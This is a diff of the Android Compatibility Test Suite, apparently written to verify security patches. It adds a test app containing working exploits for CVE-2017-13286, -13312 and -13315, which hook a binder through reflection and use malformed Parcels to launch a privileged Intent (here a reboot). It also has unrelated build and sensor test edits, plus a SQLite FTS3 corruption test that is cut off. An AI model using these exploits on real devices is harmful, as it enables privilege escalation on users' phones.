diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/launchanywhere/res/xml/launchanywhere_authenticator.xml
similarity index 82%
rename from tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/res/values/strings.xml
rename to hostsidetests/securitybulletin/test-apps/launchanywhere/res/xml/launchanywhere_authenticator.xml
index 062b41c..bd8643f 100644
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionDefinerApp/res/values/strings.xml
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/res/xml/launchanywhere_authenticator.xml
@@ -14,6 +14,7 @@
limitations under the License.
-->
-<resources xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2">
- <string name="test_permission">Test Permission</string>
-</resources>
+<account-authenticator
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="com.launchanywhere"
+ />
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/Authenticator.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/Authenticator.java
new file mode 100644
index 0000000..536d9da
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/Authenticator.java
@@ -0,0 +1,180 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.IInterface;
+import android.os.Parcel;
+import android.os.RemoteException;
+
+import java.io.FileDescriptor;
+import java.lang.reflect.Field;
+
+public class Authenticator extends AbstractAccountAuthenticator {
+ static public IGenerateMalformedParcel exploit;
+
+ private int TRANSACTION_onResult;
+ private IBinder mOriginRemote;
+ private IBinder mProxyRemote = new IBinder() {
+ @Override
+ public String getInterfaceDescriptor() throws RemoteException {
+ return null;
+ }
+
+ @Override
+ public boolean pingBinder() {
+ return false;
+ }
+
+ @Override
+ public boolean isBinderAlive() {
+ return false;
+ }
+
+ @Override
+ public IInterface queryLocalInterface(String descriptor) {
+ return null;
+ }
+
+ @Override
+ public void dump(FileDescriptor fd, String[] args) throws RemoteException {}
+
+ @Override
+ public void dumpAsync(FileDescriptor fd, String[] args)
+ throws RemoteException {}
+
+ @Override
+ public boolean transact(int code, Parcel data, Parcel reply, int flags)
+ throws RemoteException {
+ if (code == TRANSACTION_onResult) {
+ data.recycle();
+ Intent payload = new Intent();
+ payload.setAction(Intent.ACTION_REBOOT);
+ data = exploit.generate(payload);
+ }
+
+ mOriginRemote.transact(code, data, reply, flags);
+ return true;
+ }
+
+ @Override
+ public void linkToDeath(DeathRecipient recipient, int flags)
+ throws RemoteException {}
+
+ @Override
+ public boolean unlinkToDeath(DeathRecipient recipient, int flags) {
+ return false;
+ }
+ };
+
+ public Authenticator(Context context) {
+ super(context);
+ }
+
+ @Override
+ public String getAuthTokenLabel(String authTokenType) {
+ return null;
+ }
+
+ @Override
+ public Bundle editProperties(AccountAuthenticatorResponse response,
+ String accountType) {
+ return null;
+ }
+
+ @Override
+ public Bundle getAuthToken(AccountAuthenticatorResponse response,
+ Account account, String authTokenType, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle addAccount(AccountAuthenticatorResponse response,
+ String accountType, String authTokenType, String[] requiredFeatures,
+ Bundle options) {
+ try {
+ Field mAccountAuthenticatorResponseField =
+ Class.forName("android.accounts.AccountAuthenticatorResponse")
+ .getDeclaredField("mAccountAuthenticatorResponse");
+
+ mAccountAuthenticatorResponseField.setAccessible(true);
+
+ Object mAccountAuthenticatorResponse =
+ mAccountAuthenticatorResponseField.get(response);
+
+ Class stubClass = null;
+ String responseName = "android.accounts.IAccountAuthenticatorResponse";
+ Class<?>[] classes = Class.forName(responseName).getDeclaredClasses();
+
+ String stubName = responseName + ".Stub";
+ for (Class inner : classes) {
+ if (inner.getCanonicalName().equals(stubName)) {
+ stubClass = inner;
+ break;
+ }
+ }
+
+ Field TRANSACTION_onResultField =
+ stubClass.getDeclaredField("TRANSACTION_onResult");
+ TRANSACTION_onResultField.setAccessible(true);
+ TRANSACTION_onResult = TRANSACTION_onResultField.getInt(null);
+
+ Class proxyClass = null;
+ String proxyName = stubName + ".Proxy";
+ for (Class inner : stubClass.getDeclaredClasses()) {
+ if (inner.getCanonicalName().equals(proxyName)) {
+ proxyClass = inner;
+ break;
+ }
+ }
+
+ Field mRemoteField = proxyClass.getDeclaredField("mRemote");
+ mRemoteField.setAccessible(true);
+ mOriginRemote = (IBinder) mRemoteField.get(mAccountAuthenticatorResponse);
+ mRemoteField.set(mAccountAuthenticatorResponse, mProxyRemote);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ return new Bundle();
+ }
+
+ @Override
+ public Bundle confirmCredentials(
+ AccountAuthenticatorResponse response, Account account, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle updateCredentials(AccountAuthenticatorResponse response,
+ Account account, String authTokenType, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle hasFeatures(
+ AccountAuthenticatorResponse response, Account account, String[] features)
+ {
+ return null;
+ }
+}
\ No newline at end of file
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/AuthenticatorService.java
similarity index 61%
copy from tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml
copy to hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/AuthenticatorService.java
index 84ba0ed..58d75b8 100644
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/AuthenticatorService.java
@@ -1,5 +1,4 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
+/**
* Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
@@ -13,14 +12,19 @@
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
- -->
+ */
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="android.permission.cts.revokepermissionwhenremoved.userapp">
+package com.android.security.cts.launchanywhere;
- <uses-permission android:name="android.permission.cts.revokepermissionwhenremoved.TestPermission" />
+import android.app.Service;
+import android.content.Intent;
+import android.os.IBinder;
- <application>
- </application>
-</manifest>
+public class AuthenticatorService extends Service {
+ protected static final String TAG = StartExploit.TAG;
+ @Override
+ public IBinder onBind(Intent intent) {
+ return new Authenticator(this).getIBinder();
+ }
+}
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java
new file mode 100644
index 0000000..752b06d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java
@@ -0,0 +1,78 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.launchanywhere;
+
+import com.android.security.cts.launchanywhere.IGenerateMalformedParcel;
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Parcel;
+
+public class CVE_2017_13286 implements IGenerateMalformedParcel {
+ @Override
+ public Parcel generate(Intent intent) {
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts." +
+ "IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ data.writeString("launchanywhere");
+ data.writeInt(4);
+ data.writeString("android.hardware.camera2.params.OutputConfiguration");
+ data.writeInt(0);
+ data.writeInt(1);
+ data.writeInt(2);
+ data.writeInt(3);
+ data.writeInt(4);
+ data.writeInt(5);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(13);
+
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ int byteArrayStartPos = data.dataPosition();
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+
+ return data;
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13312.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13312.java
new file mode 100644
index 0000000..4678de2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13312.java
@@ -0,0 +1,76 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Parcel;
+
+public class CVE_2017_13312 implements IGenerateMalformedParcel {
+ public Parcel generate(Intent intent) {
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ try {
+ Class clazz = Class.forName("android.media.MediaCas$ParcelableCasData");
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ data.writeString("xjoa8h2");
+ data.writeInt(4);
+ data.writeString("android.media.MediaCas$ParcelableCasData");
+
+ data.writeInt(13);
+ data.writeInt(32);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+
+ data.writeInt(13);
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ int byteArrayStartPos = data.dataPosition();
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+
+ return data;
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13315.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13315.java
new file mode 100644
index 0000000..dc15e7e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13315.java
@@ -0,0 +1,69 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Parcel;
+
+public class CVE_2017_13315 implements IGenerateMalformedParcel {
+ public Parcel generate(Intent intent) {
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ data.writeString("launchanywhere");
+ data.writeInt(4);
+ data.writeString("com.android.internal.telephony.DcParamObject");
+ data.writeInt(0);
+
+ data.writeInt(0);
+ data.writeInt(6);
+ data.writeInt(13);
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ int byteArrayStartPos = data.dataPosition();
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+
+ return data;
+ }
+}
\ No newline at end of file
diff --git a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/IGenerateMalformedParcel.java
similarity index 63%
rename from tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml
rename to hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/IGenerateMalformedParcel.java
index 84ba0ed..bb473ab 100644
--- a/tests/tests/permission/testapps/RevokePermissionWhenRemoved/AdversarialPermissionUserApp/AndroidManifest.xml
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/IGenerateMalformedParcel.java
@@ -1,5 +1,4 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
+/**
* Copyright (C) 2018 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
@@ -13,14 +12,11 @@
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
- -->
+ */
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- package="android.permission.cts.revokepermissionwhenremoved.userapp">
+package com.android.security.cts.launchanywhere;
- <uses-permission android:name="android.permission.cts.revokepermissionwhenremoved.TestPermission" />
+import android.content.Intent;
+import android.os.Parcel;
- <application>
- </application>
-</manifest>
-
+public interface IGenerateMalformedParcel { Parcel generate(Intent i); }
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/StartExploit.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/StartExploit.java
new file mode 100644
index 0000000..2d439da
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/StartExploit.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.app.Activity;
+import android.content.ComponentName;
+import android.content.Intent;
+import android.os.Bundle;
+import android.util.Log;
+
+public class StartExploit extends Activity {
+ protected static final String TAG = "LaunchAnyWhere";
+
+ @Override
+ public void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+
+ String exploitName = "com.android.security.cts.launchanywhere." +
+ getIntent().getStringExtra("cve");
+
+ String classAccessMessage = "Please ensure that the class is part of "
+ + "the com.android.security.cts.launchanywhere package";
+
+ try {
+ Authenticator.exploit =
+ (IGenerateMalformedParcel) Class.forName(exploitName)
+ .newInstance();
+ } catch (ClassNotFoundException e) {
+ Log.e(TAG, "Unable to load the class " + exploitName + "! " +
+ classAccessMessage);
+ e.printStackTrace();
+ return;
+ } catch (InstantiationException e) {
+ Log.e(TAG, "Unable to instantiate the exploit! " + exploitName);
+ e.printStackTrace();
+ return;
+ } catch (IllegalAccessException e) {
+ Log.e(TAG,
+ "Unable to access class " + exploitName + "! " +
+ classAccessMessage + " and is not private");
+ e.printStackTrace();
+ return;
+ }
+
+ Intent attacker = new Intent();
+ attacker.setComponent(new ComponentName(
+ "com.android.settings",
+ "com.android.settings.accounts.AddAccountSettings"));
+ attacker.setAction(Intent.ACTION_RUN);
+ attacker.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ String authTypes[] = {"com.launchanywhere"};
+ attacker.putExtra("account_types", authTypes);
+ startActivity(attacker);
+ }
+}
\ No newline at end of file
diff --git a/hostsidetests/sustainedperf/shadertoy_android/Android.mk b/hostsidetests/sustainedperf/shadertoy_android/Android.mk
index 190ce5d..2e1bbdd 100644
--- a/hostsidetests/sustainedperf/shadertoy_android/Android.mk
+++ b/hostsidetests/sustainedperf/shadertoy_android/Android.mk
@@ -31,7 +31,6 @@
LOCAL_PACKAGE_NAME := CtsSustainedPerformanceTestCases
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 5
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/hostsidetests/theme/app/Android.mk b/hostsidetests/theme/app/Android.mk
index c2cc382..de63355 100644
--- a/hostsidetests/theme/app/Android.mk
+++ b/hostsidetests/theme/app/Android.mk
@@ -39,6 +39,5 @@
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
LOCAL_SDK_VERSION := 23
-#LOCAL_MIN_SDK_VERSION := 17
include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/usb/SerialTestApp/Android.mk b/hostsidetests/usb/SerialTestApp/Android.mk
index 4baa577..601c0ba 100644
--- a/hostsidetests/usb/SerialTestApp/Android.mk
+++ b/hostsidetests/usb/SerialTestApp/Android.mk
@@ -29,7 +29,6 @@
LOCAL_PACKAGE_NAME := CtsUsbSerialTestApp
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 27
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests cts_instant
diff --git a/tests/app/Android.mk b/tests/app/Android.mk
index 52dcb69..e38ad2f 100644
--- a/tests/app/Android.mk
+++ b/tests/app/Android.mk
@@ -47,7 +47,6 @@
LOCAL_INSTRUMENTATION_FOR := CtsAppTestStubs
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 11
include $(BUILD_CTS_PACKAGE)
diff --git a/tests/leanbackjank/app/Android.mk b/tests/leanbackjank/app/Android.mk
index f23d99c..b6404fe 100644
--- a/tests/leanbackjank/app/Android.mk
+++ b/tests/leanbackjank/app/Android.mk
@@ -24,7 +24,6 @@
LOCAL_PACKAGE_NAME := CtsLeanbackJankApp
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 21
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/tests/openglperf2/Android.mk b/tests/openglperf2/Android.mk
index 02ae698..8fa4296 100644
--- a/tests/openglperf2/Android.mk
+++ b/tests/openglperf2/Android.mk
@@ -33,6 +33,5 @@
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
LOCAL_SDK_VERSION := 16
-#LOCAL_MIN_SDK_VERSION := 16
include $(BUILD_CTS_PACKAGE)
diff --git a/tests/sensor/src/android/hardware/cts/SensorParameterRangeTest.java b/tests/sensor/src/android/hardware/cts/SensorParameterRangeTest.java
index 44135bc..c1c9fab 100644
--- a/tests/sensor/src/android/hardware/cts/SensorParameterRangeTest.java
+++ b/tests/sensor/src/android/hardware/cts/SensorParameterRangeTest.java
@@ -77,23 +77,23 @@
public void testAccelerometerRange() {
checkSensorRangeAndFrequency(
- mSensorManager.getDefaultSensor(Sensor.TYPE_ACCELEROMETER),
+ Sensor.TYPE_ACCELEROMETER,
ACCELEROMETER_MAX_RANGE,
ACCELEROMETER_MIN_FREQUENCY,
ACCELEROMETER_MAX_FREQUENCY);
- }
+ }
- public void testGyroscopeRange() {
+ public void testGyroscopeRange() {
checkSensorRangeAndFrequency(
- mSensorManager.getDefaultSensor(Sensor.TYPE_GYROSCOPE),
+ Sensor.TYPE_GYROSCOPE,
GYRO_MAX_RANGE,
GYRO_MIN_FREQUENCY,
GYRO_MAX_FREQUENCY);
- }
+ }
public void testMagnetometerRange() {
checkSensorRangeAndFrequency(
- mSensorManager.getDefaultSensor(Sensor.TYPE_MAGNETIC_FIELD),
+ Sensor.TYPE_MAGNETIC_FIELD,
MAGNETOMETER_MAX_RANGE,
MAGNETOMETER_MIN_FREQUENCY,
MAGNETOMETER_MAX_FREQUENCY);
@@ -102,7 +102,7 @@
public void testPressureRange() {
if (mHasHifiSensors) {
checkSensorRangeAndFrequency(
- mSensorManager.getDefaultSensor(Sensor.TYPE_PRESSURE),
+ Sensor.TYPE_PRESSURE,
PRESSURE_MAX_RANGE,
PRESSURE_MIN_FREQUENCY,
PRESSURE_MAX_FREQUENCY);
@@ -110,8 +110,14 @@
}
private void checkSensorRangeAndFrequency(
- Sensor sensor, double maxRange, double minFrequency, double maxFrequency) {
+ int sensorType, double maxRange, double minFrequency, double maxFrequency) {
if (!mHasHifiSensors && !mVrModeHighPerformance) return;
+
+ Sensor sensor = mSensorManager.getDefaultSensor(sensorType);
+ if (sensor == null) {
+ fail(String.format("Must support sensor type %d", sensorType));
+ }
+
assertTrue(String.format("%s Range actual=%.2f expected=%.2f %s",
sensor.getName(), sensor.getMaximumRange(), maxRange,
SensorCtsHelper.getUnitsForSensor(sensor)),
diff --git a/tests/sensor/src/android/hardware/cts/SensorSupportTest.java b/tests/sensor/src/android/hardware/cts/SensorSupportTest.java
index 6fd0865..35d48df 100644
--- a/tests/sensor/src/android/hardware/cts/SensorSupportTest.java
+++ b/tests/sensor/src/android/hardware/cts/SensorSupportTest.java
@@ -22,6 +22,9 @@
import android.hardware.Sensor;
import android.hardware.SensorDirectChannel;
import android.hardware.SensorManager;
+import android.os.Build;
+
+import com.android.compatibility.common.util.PropertyUtil;
/**
* Checks if Hifi sensors or VR High performance mode sensors
@@ -61,7 +64,10 @@
}
public void testSupportsAccelerometerUncalibrated() {
- checkSupportsSensor(Sensor.TYPE_ACCELEROMETER_UNCALIBRATED);
+ // Uncalibrated accelerometer was not required before Android O
+ if (PropertyUtil.getFirstApiLevel() >= Build.VERSION_CODES.O) {
+ checkSupportsSensor(Sensor.TYPE_ACCELEROMETER_UNCALIBRATED);
+ }
}
public void testSupportsGyroscope() {
diff --git a/tests/signature/api-check/android-test-base-27-api/Android.mk b/tests/signature/api-check/android-test-base-27-api/Android.mk
index dc8dea0..1adcb12c 100644
--- a/tests/signature/api-check/android-test-base-27-api/Android.mk
+++ b/tests/signature/api-check/android-test-base-27-api/Android.mk
@@ -21,6 +21,4 @@
LOCAL_SIGNATURE_API_FILES := \
android-test-base-current.api \
-LOCAL_MIN_SDK_VERSION := 25
-
include $(LOCAL_PATH)/../build_signature_apk.mk
diff --git a/tests/signature/api-check/apache-http-legacy-27-api/Android.mk b/tests/signature/api-check/apache-http-legacy-27-api/Android.mk
index 4e17901..0f2161a 100644
--- a/tests/signature/api-check/apache-http-legacy-27-api/Android.mk
+++ b/tests/signature/api-check/apache-http-legacy-27-api/Android.mk
@@ -22,6 +22,4 @@
current.api \
apache-http-legacy-minus-current.api \
-LOCAL_MIN_SDK_VERSION := 22
-
include $(LOCAL_PATH)/../build_signature_apk.mk
diff --git a/tests/tests/batterysaving/apps/app_target_api_25/Android.mk b/tests/tests/batterysaving/apps/app_target_api_25/Android.mk
index 42c1466..f1ebee6 100644
--- a/tests/tests/batterysaving/apps/app_target_api_25/Android.mk
+++ b/tests/tests/batterysaving/apps/app_target_api_25/Android.mk
@@ -33,7 +33,6 @@
ub-uiautomator
LOCAL_SDK_VERSION := test_current
-LOCAL_MIN_SDK_VERSION := 23
# tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/tests/tests/calendarcommon/Android.mk b/tests/tests/calendarcommon/Android.mk
index fd97621..bfd9f26 100644
--- a/tests/tests/calendarcommon/Android.mk
+++ b/tests/tests/calendarcommon/Android.mk
@@ -32,7 +32,6 @@
LOCAL_SRC_FILES := $(call all-java-files-under, src)
LOCAL_SDK_VERSION := current
-LOCAL_MIN_SDK_VERSION := 15
# Tag this module as a cts test artifact
LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
diff --git a/tests/tests/database/src/android/database/sqlite/cts/SQLiteSecurityTest.java b/tests/tests/database/src/android/database/sqlite/cts/SQLiteSecurityTest.java
new file mode 100644
index 0000000..c34a5f5
--- /dev/null
+++ b/tests/tests/database/src/android/database/sqlite/cts/SQLiteSecurityTest.java
@@ -0,0 +1,152 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.database.sqlite.cts;
+
+
+import android.content.Context;
+import android.database.sqlite.SQLiteDatabase;
+import android.database.sqlite.SQLiteDatabaseCorruptException;
+import android.test.AndroidTestCase;
+
+/**
+ * This CTS test verifies Magellan SQLite Security Vulnerability.
+ * Without the fix, the last statement in each test case triggers a segmentation fault and the test
+ * fails.
+ * With the fix, the last statement in each test case triggers SQLiteDatabaseCorruptException with
+ * message "database disk image is malformed (code 267 SQLITE_CORRUPT_VTAB)", this is expected
+ * behavior that we are crashing and we are not leaking data.
+ */
+public class SQLiteSecurityTest extends AndroidTestCase {
+ private static final String DATABASE_NAME = "database_test.db";
+
+ private SQLiteDatabase mDatabase;
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+
+ getContext().deleteDatabase(DATABASE_NAME);
+ mDatabase = getContext().openOrCreateDatabase(DATABASE_NAME, Context.MODE_PRIVATE,
+ null);
+ assertNotNull(mDatabase);
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ mDatabase.close();
+ getContext().deleteDatabase(DATABASE_NAME);
+
+ super.tearDown();
+ }
+
+ public void testScript1() {
+ mDatabase.beginTransaction();
+ mDatabase.execSQL("CREATE VIRTUAL TABLE ft USING fts3;");
+ mDatabase.execSQL("INSERT INTO ft_content VALUES(1,'aback');");
+ mDatabase.execSQL("INSERT INTO ft_content VALUES(2,'abaft');");
+ mDatabase.execSQL("INSERT INTO ft_content VALUES(3,'abandon');");
+ mDatabase.execSQL("INSERT INTO ft_segdir VALUES(0,0,0,0,'0 29',X"
